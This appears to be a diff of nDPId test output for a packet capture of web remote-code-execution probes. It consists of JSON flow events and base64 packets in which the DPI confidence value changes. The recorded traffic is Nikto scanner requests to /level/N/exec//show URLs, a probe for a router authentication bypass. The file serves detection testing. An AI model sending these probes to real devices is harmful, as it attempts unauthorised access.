-01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/26\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001273)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/26\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001273)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1576420277598,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277598,"pkt":"AAAAAAAAAAAAAAAACABFAADIuK1AAEAGg4B\/AAABfwAAAcYYH5AkxYBd7ezrAoAYAED+vAAAAQEICp1m\/oadZv6GR0VUIC9sZXZlbC8yNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzQpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/27\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001274)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/27\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001274)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1576420277600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277600,"pkt":"AAAAAAAAAAAAAAAACABFAADIQiNAAEAG+gp\/AAABfwAAAcYaH5DTCnrawy0BcYAYAED+vAAAAQEICp1m\/oidZv6IR0VUIC9sZXZlbC8yOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/28\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001275)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/28\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001275)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1576420277602,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277602,"pkt":"AAAAAAAAAAAAAAAACABFAADIalZAAEAG0dd\/AAABfwAAAcYcH5BVA1KtKWKiFYAYAED+vAAAAQEICp1m\/oqdZv6JR0VUIC9sZXZlbC8yOS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/29\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001276)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/29\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001276)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1576420277604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277604,"pkt":"AAAAAAAAAAAAAAAACABFAADIeUZAAEAGwud\/AAABfwAAAcYeH5Dj\/UG+lxmHS4AYAED+vAAAAQEICp1m\/oudZv6LR0VUIC9sZXZlbC8zMC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/30\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001277)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/30\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001277)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1576420277607,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277607,"pkt":"AAAAAAAAAAAAAAAACABFAADISctAAEAG8mJ\/AAABfwAAAcYgH5D3W3ExGI1+2IAYAED+vAAAAQEICp1m\/o6dZv6OR0VUIC9sZXZlbC8zMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzgpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/31\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001278)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/31\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001278)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1576420277608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277608,"pkt":"AAAAAAAAAAAAAAAACABFAADIARxAAEAGOxJ\/AAABfwAAAcYiH5DcsTnhkT\/ypIAYAED+vAAAAQEICp1m\/pCdZv6QR0VUIC9sZXZlbC8zMi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/32\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001279)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/32\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001279)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1576420277609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277609,"pkt":"AAAAAAAAAAAAAAAACABFAADIVW1AAEAG5sB\/AAABfwAAAcYkH5Dpym2S0+8SfoAYAED+vAAAAQEICp1m\/pGdZv6RR0VUIC9sZXZlbC8zMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjgwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/33\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001280)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/33\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001280)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 